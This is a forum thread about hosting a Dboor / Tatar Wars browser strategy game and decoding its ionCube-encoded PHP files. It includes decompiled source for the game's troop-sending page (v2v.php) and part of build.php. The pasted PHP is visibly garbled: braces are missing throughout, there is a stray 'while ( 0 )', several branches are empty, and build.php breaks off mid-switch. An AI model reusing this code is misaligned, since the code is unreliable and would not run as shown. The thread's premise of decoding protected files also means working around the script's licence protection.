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Decoding Dboor 100%

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Newbie Spellweaver
Apr 1, 2012
Reaction score
i'm searching a GOOD HOST not free without crash ,without overloaded,without this message:
Website you were trying to visit was disabled for 5 minutes, because it received over 20% of total server requests.
It means that this website was using over 20% of processor resources, which is above allowed limit.
Website was temporary disabled to protect server from overloading and other websites on server.
Please try again in 5 minutes.
thank you
Junior Spellweaver
Jan 11, 2012
Reaction score
What I suggest is using a VPS, it is more expensive but it's the best solution if you want to host a game of any kind. That is what I do and there are never any issues. Search for VPS on google and find a good deal, in my opinion its the best choice for hosting games.
Newbie Spellweaver
Dec 9, 2011
Reaction score
need v2v.php decoded 100%
without problems ..
all dboor files encoded with ioncube 6.5 .
but u need to decode it and fix the problems .
then u get the file 100% . .
Newbie Spellweaver
Apr 1, 2012
Reaction score
thank you ubi, i find a new problem, catapult of arab don't appare in blacksmith and armoury

ubi ,what is the host of you server,do you have this problem of overloaded and how cost /month ?

ubi, with thi i can't catapult great warehouse,greatgranary and ww,you can control it?

/*                   */
/*  Version : 5.1.0  */
/*  Author  : RM     */
/*  Comment : 071223 */
/*                   */

require( ".".DIRECTORY_SEPARATOR."app".DIRECTORY_SEPARATOR."boot.php" );
require_once( MODEL_PATH."v2v.php" );
require_once( MODEL_PATH."build.php" );
class GPage extends VillagePage

	public $pageState = NULL;
	public $targetVillage = array
		"x" => NULL,
		"y" => NULL
	public $troops = NULL;
	public $disableFirstTwoAttack = FALSE;
	public $attackWithCatapult = FALSE;
	public $transferType = 2;
	public $errorTable = array( );
	public $newVillageResources = array
		1 => 750,
		2 => 750,
		3 => 750,
		4 => 750
	public $rallyPointLevel = 0;
	public $totalCatapultTroopsCount = 0;
	public $catapultCanAttackLastIndex = 0;
	public $availableCatapultTargetsString = "";
	public $catapultCanAttack = array
		0 => 0,
		1 => 10,
		2 => 11,
		3 => 9,
		4 => 6,
		5 => 2,
		6 => 4,
		7 => 8,
		8 => 7,
		9 => 3,
		10 => 5,
		11 => 1,
		12 => 22,
		13 => 13,
		14 => 19,
		15 => 12,
		16 => 35,
		17 => 18,
		18 => 29,
		19 => 30,
		20 => 37,
		21 => 41,
		22 => 15,
		23 => 17,
		24 => 26,
		25 => 16,
		26 => 25,
		27 => 20,
		28 => 14,
		29 => 24,
		30 => 28,
		31 => 40,
		32 => 21
	public $onlyOneSpyAction = FALSE;
	public $backTroopsProperty = array( );

	public function GPage( )
		parent::villagepage( );
		$this->viewFile = "v2v.phtml";
		$this->contentCssClass = "a2b";

	public function onLoadBuildings( $building )
		if ( $building['item_id'] == 16 && $this->rallyPointLevel < $building['level'] )
			$this->rallyPointLevel = $building['level'];

	public function load( )
		parent::load( );
		if ( $this->rallyPointLevel <= 0 )
			$this->redirect( "build.php?id=39" );
		else if ( isset( $_GET['d1'] ) || isset( $_GET['d2'] ) || isset( $_GET['d3'] ) )
			$this->pageState = 3;
			$this->handleTroopBack( );
			$m = new WarModel( );
			$this->pageState = 1;
			$map_size = $this->setupMetadata['map_size'];
			$half_map_size = floor( $map_size / 2 );
			$this->hasHero = $this->data['hero_in_village_id'] == $this->data['selected_village_id'];
			$t_arr = explode( "|", $this->data['troops_num'] );
			foreach ( $t_arr as $t_str )
				$t2_arr = explode( ":", $t_str );
				if ( $t2_arr[0] == 0 - 1 )
					$t2_arr = explode( ",", $t2_arr[1] );
					foreach ( $t2_arr as $t2_str )
						$t = explode( " ", $t2_str );
						if ( $t[0] == 99 )
						$this->troops[] = array(
							"troopId" => $t[0],
							"number" => $t[1]
			$attackOptions1 = "";
			$sendTroops = FALSE;
			$playerData = NULL;
			$villageRow = NULL;
			if ( !$this->isPost( ) )
				if ( isset( $_GET['id'] ) && is_numeric( $_GET['id'] ) )
					$vid = intval( $_GET['id'] );
					if ( $vid < 1 )
						$vid = 1;
					$villageRow = $m->getVillageDataById( $vid );
			else if ( isset( $_POST['id'] ) )
				$sendTroops = !$this->isGameTransientStopped( ) && !$this->isGameOver( );
				$vid = intval( $_POST['id'] );
				$villageRow = $m->getVillageDataById( $vid );
			else if ( isset( $_POST['dname'] ) && trim( $_POST['dname'] ) != "" )
				$villageRow = $m->getVillageDataByName( trim( $_POST['dname'] ) );
			else if ( isset( $_POST['x'], $_POST['y'] ) && trim( $_POST['x'] ) != "" && trim( $_POST['y'] ) != "" )
				$vid = $this->__getVillageId( $map_size, $this->__getCoordInRange( $map_size, intval( $_POST['x'] ) ), $this->__getCoordInRange( $map_size, intval( $_POST['y'] ) ) );
				$villageRow = $m->getVillageDataById( $vid );
			if ( $villageRow == NULL )
				if ( $this->isPost( ) )
					$this->errorTable = v2v_p_entervillagedata;
				$this->disableFirstTwoAttack = intval( $villageRow['player_id'] ) == 0 && $villageRow['is_oasis'];
				$this->targetVillage['x'] = floor( ( $villageRow['id'] - 1 ) / $map_size );
				$this->targetVillage['y'] = $villageRow['id'] - ( $this->targetVillage['x'] * $map_size + 1 );
				if ( $half_map_size < $this->targetVillage['x'] )
					$this->targetVillage['x'] -= $map_size;
				if ( $half_map_size < $this->targetVillage['y'] )
					$this->targetVillage['y'] -= $map_size;
				if ( $villageRow['id'] == $this->data['selected_village_id'] )
				if ( 0 < intval( $villageRow['player_id'] ) && $m->getPlayType( $villageRow['player_id'] ) == PLAYERTYPE_ADMIN )
				$spyOnly = FALSE;
				if ( !$villageRow['is_oasis'] && intval( $villageRow['player_id'] ) == 0 )
					$this->transferType = 1;
					$humanTroopId = 0;
					$renderTroops = array( );
					foreach ( $this->troops as $troop )
						$renderTroops[$troop['troopId']] = 0;
						if ( $troop['troopId'] == 10 || $troop['troopId'] == 20 || $troop['troopId'] == 30 || $troop['troopId'] == 109 || $troop['troopId'] == 60 )
							$humanTroopId = $troop['troopId'];
							$renderTroops[$humanTroopId] = $troop['number'];
					$canBuildNewVillage = isset( $renderTroops[$humanTroopId] ) && 3 <= $renderTroops[$humanTroopId];
					if ( $canBuildNewVillage )
						$count = trim( $this->data['child_villages_id'] ) == "" ? 0 : sizeof( explode( ",", $this->data['child_villages_id'] ) );
						if ( 2 < $count )
							$this->errorTable = v2v_p_cannotbuildnewvill;
						else if ( !$this->_canBuildNewVillage( ) )
							$this->errorTable = v2v_p_cannotbuildnewvill1;
						else if ( !$this->isResourcesAvailable( $this->newVillageResources ) )
							$this->errorTable = sprintf( v2v_p_cannotbuildnewvill2, $this->newVillageResources['1'] );
						else if ( !$m->hasNewVillageTask( $this->player->playerId ) )
							$this->errorTable = v2v_p_cannotbuildnewvill3;
							$this->errorTable = v2v_p_cannotbuildnewvill4;
						} while ( 0 );
						$this->pageState = 2;
				else if ( $this->isPost( ) )
					if ( !$villageRow['is_oasis'] && intval( $villageRow['player_id'] ) == 0 )
						$this->errorTable = v2v_p_novillagehere;
						if ( !isset( $_POST['c'] ) || intval( $_POST['c'] ) < 1 || 4 < intval( $_POST['c'] ) )
						$this->transferType = $this->disableFirstTwoAttack ? 4 : intval( $_POST['c'] );
						if ( 0 < intval( $villageRow['player_id'] ) )
							$playerData = $m->getPlayerDataById( intval( $villageRow['player_id'] ) );
							if ( $playerData['is_blocked'] )
								$this->errorTable = v2v_p_playerwas_blocked;
							else if ( 0 < $playerData['protection_remain_sec'] )
								$this->errorTable = v2v_p_playerwas_inprotectedperiod;
							$totalTroopsCount = 0;
							$totalSpyTroopsCount = 0;
							$this->totalCatapultTroopsCount = 0;
							$hasTroopsSelected = FALSE;
							$renderTroops = array( );
							if ( isset( $_POST['t'] ) )
								foreach ( $this->troops as $troop )
									$num = 0;
									if ( isset( $_POST['t'][$troop['troopId']] ) && 0 < intval( $_POST['t'][$troop['troopId']] ) )
										$num = $troop['number'] < $_POST['t'][$troop['troopId']] ? $troop['number'] : intval( $_POST['t'][$troop['troopId']] );
									$renderTroops[$troop['troopId']] = $num;
									$totalTroopsCount += $num;
									if ( 0 < $num )
										$hasTroopsSelected = TRUE;
									if ( $troop['troopId'] == 4 || $troop['troopId'] == 14 || $troop['troopId'] == 23 || $troop['troopId'] == 103 || $troop['troopId'] == 54 )
										$totalSpyTroopsCount += $num;
									else if ( $troop['troopId'] == 8 || $troop['troopId'] == 18 || $troop['troopId'] == 28 || $troop['troopId'] == 107 || $troop['troopId'] == 58 )
										$this->totalCatapultTroopsCount += $num;
							if ( $this->hasHero && isset( $_POST['_t'] ) && intval( $_POST['_t'] ) == 1 )
								$hasTroopsSelected = TRUE;
								$totalTroopsCount += 1;
							$spyOnly = $totalSpyTroopsCount == $totalTroopsCount && ( $this->transferType == 3 || $this->transferType == 4 ) && 0 < intval( $villageRow['player_id'] );
							if ( $spyOnly )
								$this->onlyOneSpyAction = $villageRow['is_oasis'];
							$this->attackWithCatapult = 0 < $this->totalCatapultTroopsCount && $this->transferType == 3 && 0 < intval( $villageRow['player_id'] ) && !$villageRow['is_oasis'];
							if ( $this->attackWithCatapult )
								if ( 10 <= $this->rallyPointLevel )
									$this->catapultCanAttackLastIndex = sizeof( $this->catapultCanAttack ) - 1;
								else if ( 5 <= $this->rallyPointLevel )
									$this->catapultCanAttackLastIndex = 11;
								else if ( 3 <= $this->rallyPointLevel )
									$this->catapultCanAttackLastIndex = 2;
									$this->catapultCanAttackLastIndex = 0;
								$attackOptions1 = isset( $_POST['dtg'] ) && $this->_containBuildingTarget( $_POST['dtg'] ) ? intval( $_POST['dtg'] ) : 0;
								if ( $this->rallyPointLevel == 20 && 20 <= $this->totalCatapultTroopsCount )
									$attackOptions1 = "2:".( $attackOptions1." ".( isset( $_POST['dtg1'] ) && $this->_containBuildingTarget( $_POST['dtg1'] ) ? intval( $_POST['dtg1'] ) : 0 ) );
									$attackOptions1 = "1:".$attackOptions1;
								$this->availableCatapultTargetsString = "";
								$selectComboTargetOptions = "";
								$i = 1;
								while ( $i <= 9 )
									if ( $this->_containBuildingTarget( $i ) )
										$selectComboTargetOptions .= sprintf( "<option value=\"%s\">%s</option>", $i, constant( "item_".$i ) );
								if ( $selectComboTargetOptions != "" )
									$this->availableCatapultTargetsString .= "<optgroup label=\"".v2v_p_catapult_grp1."\">".$selectComboTargetOptions."</optgroup>";
								$selectComboTargetOptions = "";
								$i = 10;
								while ( $i <= 28 )
									if ( ( $i == 10 || $i == 11 || $i == 15 || $i == 17 || $i == 18 || $i == 24 || $i == 25 || $i == 26 || $i == 28 || $i == 38 || $i == 39 ) && $this->_containBuildingTarget( $i ) )
										$selectComboTargetOptions .= sprintf( "<option value=\"%s\">%s</option>", $i, constant( "item_".$i ) );
								if ( $selectComboTargetOptions != "" )
									$this->availableCatapultTargetsString .= "<optgroup label=\"".v2v_p_catapult_grp2."\">".$selectComboTargetOptions."</optgroup>";
								$selectComboTargetOptions = "";
								$i = 12;
								while ( $i <= 37 )
									if ( ( $i == 12 || $i == 13 || $i == 14 || $i == 16 || $i == 19 || $i == 20 || $i == 21 || $i == 22 || $i == 35 || $i == 37 ) && $this->_containBuildingTarget( $i ) )
										$selectComboTargetOptions .= sprintf( "<option value=\"%s\">%s</option>", $i, constant( "item_".$i ) );
								if ( $selectComboTargetOptions != "" )
									$this->availableCatapultTargetsString .= "<optgroup label=\"".v2v_p_catapult_grp3."\">".$selectComboTargetOptions."</optgroup>";
							if ( !$hasTroopsSelected )
								$this->errorTable = v2v_p_thereisnoattacktroops;
								$this->pageState = 2;
				if ( $this->pageState == 2 )
					$this->targetVillage['transferType'] = $this->transferType == 1 ? v2v_p_attacktyp1 : $this->transferType == 2 ? v2v_p_attacktyp2." " : $this->transferType == 3 ? v2v_p_attacktyp3 : $this->transferType == 4 ? v2v_p_attacktyp4 : "";
					if ( $villageRow['is_oasis'] )
						$this->targetVillage['villageName'] = $playerData != NULL ? v2v_p_placetyp1 : v2v_p_placetyp2;
						$this->targetVillage['villageName'] = $playerData != NULL ? $villageRow['village_name'] : v2v_p_placetyp3;
					$this->targetVillage['villageId'] = $villageRow['id'];
					$this->targetVillage['playerName'] = $playerData != NULL ? $playerData['name'] : $villageRow['is_oasis'] ? v2v_p_monster : "";
					$this->targetVillage['playerId'] = 0;
					$this->targetVillage['troops'] = $renderTroops;
					$this->targetVillage['hasHero'] = 1 < $this->transferType && $this->hasHero && isset( $_POST['_t'] ) && intval( $_POST['_t'] ) == 1;
					$distance = WebHelper::getdistance( $this->data['rel_x'], $this->data['rel_y'], $this->targetVillage['x'], $this->targetVillage['y'], $this->setupMetadata['map_size'] / 2 );
					$this->targetVillage['needed_time'] = intval( $distance / $this->_getTheSlowestTroopSpeed( $renderTroops ) * 3600 );
					$this->targetVillage['spy'] = $spyOnly;
				if ( $sendTroops )
					$taskType = 0;
					switch ( $this->transferType )
					case 1 :
						$taskType = QS_CREATEVILLAGE;
					case 2 :
						$taskType = QS_WAR_REINFORCE;
					case 3 :
						$taskType = QS_WAR_ATTACK;
					case 4 :
					$taskType = QS_WAR_ATTACK_PLUNDER;
					$spyAction = 0;
					if ( $spyOnly )
						$taskType = QS_WAR_ATTACK_SPY;
						$spyAction = isset( $_POST['spy'] ) && ( intval( $_POST['spy'] ) == 1 || intval( $_POST['spy'] ) == 2 ) ? intval( $_POST['spy'] ) : 1;
						if ( $this->onlyOneSpyAction )
							$spyAction = 1;
					$troopsStr = "";
					foreach ( $this->targetVillage['troops'] as $tid => $tnum )
						if ( $troopsStr != "" )
							$troopsStr .= ",";
						$troopsStr .= $tid." ".$tnum;
					if ( $this->targetVillage['hasHero'] )
						$troopsStr .= ",".$this->data['hero_troop_id']." -1";
					$catapultTargets = $attackOptions1;
					$carryResources = $taskType == QS_CREATEVILLAGE ? implode( " ", $this->newVillageResources ) : "";
					$procParams = $troopsStr."|".( $this->targetVillage['hasHero'] ? 1 : 0 )."|".$spyAction."|".$catapultTargets."|".$carryResources."|||0";
					$newTask = new QueueTask( $taskType, $this->player->playerId, $this->targetVillage['needed_time'] );
					$newTask->villageId = $this->data['selected_village_id'];
					$newTask->toPlayerId = intval( $villageRow['player_id'] );
					$newTask->toVillageId = $villageRow['id'];
					$newTask->procParams = $procParams;
					$newTask->tag = array(
						"troops" => $this->targetVillage['troops'],
						"hasHero" => $this->targetVillage['hasHero'],
						"resources" => $taskType == QS_CREATEVILLAGE ? $this->newVillageResources : NULL
					$this->queueModel->addTask( $newTask );
					$m->dispose( );
					$this->redirect( "build.php?id=39" );
					$m->dispose( );

	public function handleTroopBack( )
		$qstr = "";
		$fromVillageId = 0;
		$toVillageId = 0;
		$action = 0;
		if ( isset( $_GET['d1'] ) )
			$action = 1;
			$qstr = "d1=".intval( $_GET['d1'] );
			if ( isset( $_GET['o'] ) )
				$qstr .= "&o=".intval( $_GET['o'] );
				$fromVillageId = intval( $_GET['o'] );
				$fromVillageId = $this->data['selected_village_id'];
			$toVillageId = intval( $_GET['d1'] );
		else if ( isset( $_GET['d2'] ) )
			$action = 2;
			$qstr = "d2=".intval( $_GET['d2'] );
			$fromVillageId = $this->data['selected_village_id'];
			$toVillageId = intval( $_GET['d2'] );
		else if ( isset( $_GET['d3'] ) )
			$action = 3;
			$qstr = "d3=".intval( $_GET['d3'] );
			$fromVillageId = intval( $_GET['d3'] );
			$toVillageId = $this->data['selected_village_id'];
			$this->redirect( "build.php?id=39" );
		$this->backTroopsProperty['queryString'] = $qstr;
		$m = new WarModel( );
		$fromVillageData = $m->getVillageData2ById( $fromVillageId );
		$toVillageData = $m->getVillageData2ById( $toVillageId );
		if ( $fromVillageData == NULL || $toVillageData == NULL )
			$m->dispose( );
			$this->redirect( "build.php?id=39" );
			$vid = $toVillageId;
			$_backTroopsStr = "";
			$this->backTroopsProperty['headerText'] = v2v_p_backtroops;
			$this->backTroopsProperty['action1'] = "<a href=\"village3.php?id=".$fromVillageData['id']."\">".$fromVillageData['village_name']."</a>";
			$this->backTroopsProperty['action2'] = "<a href=\"profile.php?uid=".$fromVillageData['player_id']."\">".v2v_p_troopsinvillagenow."</a>";
			$column1 = "";
			$column2 = "";
			if ( $action == 1 )
				$_backTroopsStr = $fromVillageData['troops_num'];
				$column1 = "troops_num";
				$column2 = "troops_out_num";
			else if ( $action == 2 )
				$this->backTroopsProperty['headerText'] = v2v_p_backcaptivitytroops;
				$_backTroopsStr = $fromVillageData['troops_intrap_num'];
				$column1 = "troops_intrap_num";
				$column2 = "troops_out_intrap_num";
			else if ( $action == 3 )
				$_backTroopsStr = $toVillageData['troops_out_num'];
				$vid = $fromVillageId;
				$column1 = "troops_num";
				$column2 = "troops_out_num";
			$this->backTroopsProperty['backTroops'] = $this->_getTroopsForVillage( $_backTroopsStr, $vid );
			if ( $this->backTroopsProperty['backTroops'] == NULL )
				$m->dispose( );
				$this->redirect( "build.php?id=39" );
				$distance = WebHelper::getdistance( $fromVillageData['rel_x'], $fromVillageData['rel_y'], $toVillageData['rel_x'], $toVillageData['rel_y'], $this->setupMetadata['map_size'] / 2 );
				if ( $this->isPost( ) )
					$canSend = FALSE;
					$troopsGoBack = array( );
					foreach ( $this->backTroopsProperty['backTroops']['troops'] as $tid => $tnum )
						if ( isset( $_POST['t'], $_POST['t'][$tid] ) )
							$selNum = intval( $_POST['t'][$tid] );
							if ( $selNum < 0 )
								$selNum = 0;
							if ( $tnum < $selNum )
								$selNum = $tnum;
							$troopsGoBack[$tid] = $selNum;
							if ( 0 < $selNum )
								$canSend = TRUE;
							$troopsGoBack[$tid] = 0;
					$sendTroopsArray = array(
						"troops" => $troopsGoBack,
						"hasHero" => FALSE,
						"heroTroopId" => 0
					$hasHeroTroop = $this->backTroopsProperty['backTroops']['hasHero'] && isset( $_POST['_t'] ) && intval( $_POST['_t'] ) == 1;
					if ( $hasHeroTroop )
						$sendTroopsArray['hasHero'] = TRUE;
						$sendTroopsArray['heroTroopId'] = $this->backTroopsProperty['backTroops']['heroTroopId'];
						$canSend = TRUE;
					if ( !$canSend )
						$m->dispose( );
						$this->redirect( "build.php?id=39" );
					else if ( !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
						$troops1 = $this->_getTroopsAfterReduction( $fromVillageData[$column1], $toVillageId, $sendTroopsArray );
						$troops2 = $this->_getTroopsAfterReduction( $toVillageData[$column2], $fromVillageId, $sendTroopsArray );
						$m->backTroopsFrom( $fromVillageId, $column1, $troops1, $toVillageId, $column2, $troops2 );
						$timeInSeconds = intval( $distance / $this->_getTheSlowestTroopSpeed2( $sendTroopsArray ) * 3600 );
						$procParams = $this->_getTroopAsString( $sendTroopsArray )."|0||||||1";
						$newTask = new QueueTask( QS_WAR_REINFORCE, intval( $fromVillageData['player_id'] ), $timeInSeconds );
						$newTask->villageId = $fromVillageId;
						$newTask->toPlayerId = intval( $toVillageData['player_id'] );
						$newTask->toVillageId = $toVillageId;
						$newTask->procParams = $procParams;
						$newTask->tag = array(
							"troops" => NULL,
							"hasHero" => FALSE,
							"resources" => NULL
						$affectCropConsumption = TRUE;
						if ( $fromVillageData['is_oasis'] && trim( $toVillageData['village_oases_id'] ) != "" )
							$oArr = explode( ",", trim( $toVillageData['village_oases_id'] ) );
							foreach ( $oArr as $oid )
								if ( !( $oid == $fromVillageData['id'] ) )
								$affectCropConsumption = FALSE;
						if ( $affectCropConsumption )
							$newTask->tag['troopsCropConsume'] = $this->_getTroopCropConsumption( $sendTroopsArray );
						$this->queueModel->addTask( $newTask );
						$m->dispose( );
						$this->redirect( "build.php?id=39" );
					$this->backTroopsProperty['time'] = intval( $distance / $this->_getTheSlowestTroopSpeed2( $this->backTroopsProperty['backTroops'] ) * 3600 );
				$m->dispose( );

	public function _getTroopCropConsumption( $troopsArray )
		$GameMetadata = $GLOBALS['GameMetadata'];
		$consume = 0;
		foreach ( $troopsArray['troops'] as $tid => $tnum )
			$consume += $GameMetadata['troops'][$tid]['crop_consumption'] * $tnum;
		if ( $troopsArray['hasHero'] )
			$consume += $GameMetadata['troops'][$troopsArray['heroTroopId']]['crop_consumption'];
		return $consume;

	public function _getTroopAsString( $troopsArray )
		$str = "";
		foreach ( $troopsArray['troops'] as $tid => $num )
			if ( $str != "" )
				$str .= ",";
			$str .= $tid." ".$num;
		if ( $troopsArray['hasHero'] )
			if ( $str != "" )
				$str .= ",";
			$str .= $troopsArray['heroTroopId']." -1";
		return $str;

	public function _getTroopsAfterReduction( $troopString, $targetVillageId, $sendTroopsArray )
		if ( trim( $troopString ) == "" )
			return "";
		$reductionTroopsString = "";
		$t_arr = explode( "|", $troopString );
		foreach ( $t_arr as $t_str )
			$t2_arr = explode( ":", $t_str );
			if ( $t2_arr[0] == $targetVillageId )
				$completelyBacked = TRUE;
				$newTroopStr = "";
				$t2_arr = explode( ",", $t2_arr[1] );
				foreach ( $t2_arr as $t2_str )
                    list( $tid, $tnum ) = explode( " ", $t2_str );					
                    if ( $tnum == 0 - 1 )
						if ( !$sendTroopsArray['hasHero'] )
							if ( $newTroopStr != "" )
								$newTroopStr .= ",";
							$newTroopStr .= $tid." ".$tnum;
							$completelyBacked = FALSE;
						if ( isset( $sendTroopsArray['troops'][$tid] ) )
							$n = $sendTroopsArray['troops'][$tid];
							if ( $n < 0 )
								$n = 0;
							if ( $tnum < $n )
								$n = $tnum;
							$tnum -= $n;
							if ( 0 < $tnum )
								$completelyBacked = FALSE;
						if ( $newTroopStr != "" )
							$newTroopStr .= ",";
						$newTroopStr .= $tid." ".$tnum;
				if ( !$completelyBacked )
					if ( $reductionTroopsString != "" )
						$reductionTroopsString .= "|";
					$reductionTroopsString .= $targetVillageId.":".$newTroopStr;
				if ( $reductionTroopsString != "" )
					$reductionTroopsString .= "|";
				$reductionTroopsString .= $t_str;
		return $reductionTroopsString;

	public function _getTroopsForVillage( $troopString, $villageId )
		if ( trim( $troopString ) == "" )
			return NULL;
		$t_arr = explode( "|", $troopString );
		foreach ( $t_arr as $t_str )
			$t2_arr = explode( ":", $t_str );
			if ( !( $t2_arr[0] == $villageId ) )
			$troopTable = array(
				"hasHero" => FALSE,
				"heroTroopId" => 0,
				"troops" => array( )
			$t2_arr = explode( ",", $t2_arr[1] );
			foreach ( $t2_arr as $t2_str )
				list( $tid, $tnum ) = explode( " ", $t2_str );				
                if ( $tid == 99 )
				if ( $tnum == 0 - 1 )
					$troopTable['heroTroopId'] = $tid;
					$troopTable['hasHero'] = TRUE;
				$troopTable['troops'][$tid] = $tnum;
			return $troopTable;
		return NULL;

	public function _getMaxBuildingLevel( $itemId )
		$result = 0;
		foreach ( $this->buildings as $villageBuild )
			if ( $villageBuild['item_id'] == $itemId && $result < $villageBuild['level'] )
				$result = $villageBuild['level'];
		return $result;

	public function _getTheSlowestTroopSpeed2( $troopsArray )
		$minSpeed = 0 - 1;
		foreach ( $troopsArray['troops'] as $tid => $num )
			if ( 0 < $num )
				$speed = $this->gameMetadata['troops'][$tid]['velocity'];
				if ( $minSpeed == 0 - 1 || $speed < $minSpeed )
					$minSpeed = $speed;
		if ( $troopsArray['hasHero'] )
			$htid = $troopsArray['heroTroopId'];
			$speed = $this->gameMetadata['troops'][$htid]['velocity'];
			if ( $minSpeed == 0 - 1 || $speed < $minSpeed )
				$minSpeed = $speed;
		$blvl = $this->_getMaxBuildingLevel( 14 );
		$factor = $blvl == 0 ? 100 : $this->gameMetadata['items'][14]['levels'][$blvl - 1]['value'];
		$factor *= $this->gameMetadata['game_speed'];
		return $minSpeed * ( $factor / 100 );

	public function _getTheSlowestTroopSpeed( $troopsArray )
		$minSpeed = 0 - 1;
		foreach ( $troopsArray as $tid => $num )
			if ( 0 < $num )
				$speed = $this->gameMetadata['troops'][$tid]['velocity'];
				if ( $minSpeed == 0 - 1 || $speed < $minSpeed )
					$minSpeed = $speed;
		if ( $this->hasHero && isset( $_POST['_t'] ) && intval( $_POST['_t'] ) == 1 )
			$htid = $this->data['hero_troop_id'];
			$speed = $this->gameMetadata['troops'][$htid]['velocity'];
			if ( $minSpeed == 0 - 1 || $speed < $minSpeed )
				$minSpeed = $speed;
		$blvl = $this->_getMaxBuildingLevel( 14 );
		$factor = $blvl == 0 ? 100 : $this->gameMetadata['items'][14]['levels'][$blvl - 1]['value'];
		$factor *= $this->gameMetadata['game_speed'];
		return $minSpeed * ( $factor / 100 );

	public function _canBuildNewVillage( )
		$GameMetadata = $GLOBALS['GameMetadata'];
		$neededCpValue = $totalCpRate = $totalCpValue = 0;
		$m = new BuildModel( );
		$result = $m->getVillagesCp( $this->data['villages_id'] );
		while ( $result->next( ) )
			list( $cpValue, $cpRate ) = explode( " ", $result->row['cp'] );			
            $cpValue += $result->row['elapsedTimeInSeconds'] * ( $cpRate / 86400 );
			$totalCpRate += $cpRate;
			$totalCpValue += $cpValue;
			$neededCpValue += intval( $this->gameMetadata['cp_for_new_village'] / $GameMetadata['game_speed'] );
		$totalCpValue = floor( $totalCpValue );
		$m->dispose( );
		return $neededCpValue <= $totalCpValue;

	public function __getCoordInRange( $map_size, $x )
		if ( $map_size <= $x )
			$x -= $map_size;
		else if ( $x < 0 )
			$x = $map_size + $x;
		return $x;

	public function __getVillageId( $map_size, $x, $y )
		return $x * $map_size + ( $y + 1 );

	public function _containBuildingTarget( $item_id )
		$i = 0;
		while ( $i <= $this->catapultCanAttackLastIndex )
			if ( $this->catapultCanAttack[$i] == $item_id )
				return TRUE;
		return FALSE;


$p = new GPage( );
$p->run( );

and this is the build.php

##                                                                             ##
##                                                                             ##
## --------------------------------------------------------------------------- ##
##                                                                             ##
##  Project:       TATAR WARS                                                  ##
##  Version:       2012.3.15                                                   ##
##  License:       Creative Commons BY-NC-SA 3.0                               ##
##  Copyright:     Bazaid (c) 2012 - All rights reserved                       ##
##  Source code:   https://github.com/Bazaid/tatar-wars                        ##
##                                                                             ##

require_once( MODEL_PATH."build.php" );
class GPage extends VillagePage

    public $productionPane = TRUE;
    public $buildingView = "";
    public $buildingIndex = -1;
    public $buildProperties = NULL;
    public $newBuilds = NULL;
    public $troopsUpgrade;
    public $troopsUpgradeType;
    public $buildingTribeFactor;
    public $troops = array( );
    public $selectedTabIndex = 0;
    public $villageOases;
    public $childVillages;
    public $hasHero = FALSE;
    public $totalCpRate;
    public $totalCpValue;
    public $neededCpValue;
    public $childVillagesCount;
    public $showBuildingForm;
    public $embassyProperty;
    public $merchantProperty;
    public $rallyPointProperty;
    public $crannyProperty = array( 'buildingCount' => 0, 'totalSize' => 0 );
    public $warriorMessage = "";
    public $dataList;
    public $pageSize = 40;
    public $pageCount;
    public $pageIndex;

    public function GPage( )
        parent::VillagePage( );
        $this->viewFile = "build.phtml";
        $this->contentCssClass = "build";

    public function onLoadBuildings( $building )
        $GameMetadata = $GLOBALS['GameMetadata'];
        if ( $this->buildingIndex == 0 - 1 && isset( $_GET['bid'] ) && is_numeric( $_GET['bid'] ) && $_GET['bid'] == $building['item_id'] )
            $this->buildingIndex = $building['index'];
        if ( $building['item_id'] == 23 && 0 < $building['level'] )
              $this->crannyProperty['totalSize'] += $GameMetadata['items'][$building['item_id']]['levels'][$building['level'] - 1]['value'] * $GameMetadata['items'][$building['item_id']]['for_tribe_id'][$this->tribeId];

    public function load( )
        parent::load( ); 
        if ( $this->buildingIndex == 0 - 1 && isset( $_GET['id'] ) && is_numeric( $_GET['id'] ) && isset( $this->buildings[$_GET['id']] ) )
            $this->buildingIndex = intval( $_GET['id'] );
        $this->buildProperties = $this->getBuildingProperties( $this->buildingIndex );
        if ( $this->buildProperties == NULL )
            $this->redirect( "village1.php" );
        else if ( $this->buildProperties['emptyPlace'] )
             $this->villagesLinkPostfix .= "&id=".$this->buildingIndex;
            $this->newBuilds = array( "available" => array( ), "soon" => array( ) );
            foreach ( $this->gameMetadata['items'] as $item_id => $build )
                if ( $item_id <= 4 || !isset( $build['for_tribe_id'][$this->tribeId] ) )
                $canBuild = $this->canCreateNewBuild( $item_id );
                if ( !( $canBuild != 0 - 1 ) )
                else if ( $canBuild )
                    if ( !isset( $this->newBuilds['available'][$build['levels'][0]['time_consume']] ) )
                        $this->newBuilds['available'][$build['levels'][0]['time_consume']] = array( );
                    $this->newBuilds['available'][$build['levels'][0]['time_consume']][$item_id] = $build;
                    $dependencyCount = 0;
                    foreach ( $build['pre_requests'] as $reqId => $reqValue )
                        if ( $reqValue != NULL )
                            $build['pre_requests_dependencyCount'][$reqId] = $reqValue - $this->_getMaxBuildingLevel( $reqId );
                            $dependencyCount += $build['pre_requests_dependencyCount'][$reqId];
                    if ( !isset( $this->newBuilds['soon'][$dependencyCount] ) )
                        $this->newBuilds['soon'][$dependencyCount] = array( );
                    $this->newBuilds['soon'][$dependencyCount][$item_id] = $build;
            ksort( $this->newBuilds['available'], SORT_NUMERIC );
            ksort( $this->newBuilds['soon'], SORT_NUMERIC );
            $bitemId = $this->buildProperties['building']['item_id'];
            $this->villagesLinkPostfix .= "&id=".$this->buildingIndex;
            if ( 4 < $bitemId )
                       $this->villagesLinkPostfix .= "&bid=".$bitemId;
            $this->buildingTribeFactor = isset( $this->gameMetadata['items'][$bitemId]['for_tribe_id'][$this->data['tribe_id']] ) ? $this->gameMetadata['items'][$bitemId]['for_tribe_id'][$this->data['tribe_id']] : 1;
            if ( $this->buildings[$this->buildingIndex]['level'] == 0 )
					case 12 :break;
					case 13 :
						$this->productionPane = FALSE;
						$this->buildingView = "Blacksmith_Armoury";
						$this->handleBlacksmithArmoury( );
					case 15 :
						if(10 <= $this->buildings[$this->buildingIndex]['level']){
							$this->buildingView = "MainBuilding";
					case 16 :
						$this->productionPane = FALSE;
						$this->buildingView = "RallyPoint";
						$this->handleRallyPoint( );
					case 17 :
						$this->productionPane = FALSE;
						$this->buildingView = "Marketplace";
						$this->handleMarketplace( );
					case 18 :
						$this->productionPane = FALSE;
						$this->buildingView = "Embassy";
						$this->handleEmbassy( );
					case 19 :break;
					case 20 :break;
					case 21 :break;
					case 29 :break;
					case 30 :break;
					case 36 :
						$this->_getOnlyMyTroops( );
						$this->productionPane = $bitemId == 36;
						$this->buildingView = "TroopBuilding";
